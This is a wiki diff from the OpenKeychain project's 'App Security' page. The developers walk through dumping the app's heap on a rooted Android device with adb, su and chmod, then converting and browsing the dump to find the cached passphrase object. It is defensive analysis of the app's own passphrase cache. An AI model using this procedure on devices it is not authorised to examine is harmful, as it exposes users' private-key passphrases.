Updated App Security (markdown)

dschuermann 2014-10-10 03:45:45 -07:00
parent 33fe2e6879
commit a81cbd011d
1 changed files with 19 additions and 18 deletions

@ -33,12 +33,12 @@ TODO, also: https://github.com/open-keychain/open-keychain/issues/894
1. Start OpenKeychain 1. Start OpenKeychain
2. Sign something, caching the passphrase 2. Sign something, caching the passphrase
3. 3.
``` ```
someuser@somehost platform-tools> ./adb shell someuser@somehost platform-tools> ./adb shell
$ su $ su
# chmod 777 /data/misc # chmod 777 /data/misc
# ps # ps
USER PID PPID VSIZE RSS WCHAN PC NAME USER PID PPID VSIZE RSS WCHAN PC NAME
[...snip...] [...snip...]
app_110 17973 2381 217088 24612 ffffffff afd0ee48 S org.thialfihar.android.apg app_110 17973 2381 217088 24612 ffffffff afd0ee48 S org.thialfihar.android.apg
shell 18061 2390 648 336 c031b39c afd0eafc S /system/bin/sh shell 18061 2390 648 336 c031b39c afd0eafc S /system/bin/sh
@ -51,18 +51,19 @@ bluetoothd
bluetooth bluetooth
keystore keystore
vpn vpn
systemkeys systemkeys
radio radio
wifi wifi
dhcp dhcp
heap-dump-tm1313820900-pid16096.hprof heap-dump-tm1313820900-pid16096.hprof
heap-dump-tm1313854763-pid17973.hprof heap-dump-tm1313854763-pid17973.hprof
# cp /data/misc/heap-dump-tm1313854763-pid17973.hprof /sdcard/ # cp /data/misc/heap-dump-tm1313854763-pid17973.hprof /sdcard/
# $ someuser@somehost platform-tools> ./adb pull /sdcard/heap-dump-tm1313854763-pid17973.hprof . # $ someuser@somehost platform-tools> ./adb pull /sdcard/heap-dump-tm1313854763-pid17973.hprof .
2666 KB/s (4361160 bytes in 1.597s) 2666 KB/s (4361160 bytes in 1.597s)
someuser@somehost platform-tools> ../tools/hprof-conv heap-dump-tm1313854763-pid17973.hprof apg.hprof someuser@somehost platform-tools> ../tools/hprof-conv heap-dump-tm1313854763-pid17973.hprof apg.hprof
someuser@somehost platform-tools> jhat apg.hprof someuser@somehost platform-tools> jhat apg.hprof
``` ```
4. Open a browser with ``http://localhost:7000`` and find ``CachedPassphrase`` class, see [PassphraseCacheService.java#L517](https://github.com/open-keychain/open-keychain/blob/development/OpenKeychain/src/main/java/org/sufficientlysecure/keychain/service/PassphraseCacheService.java#L517) 4. Open a browser with ``http://localhost:7000`` and find ``CachedPassphrase`` class, see [PassphraseCacheService.java#L517](https://github.com/open-keychain/open-keychain/blob/development/OpenKeychain/src/main/java/org/sufficientlysecure/keychain/service/PassphraseCacheService.java#L517)
### Attacking passphrase cache with root access ### Attacking passphrase cache with root access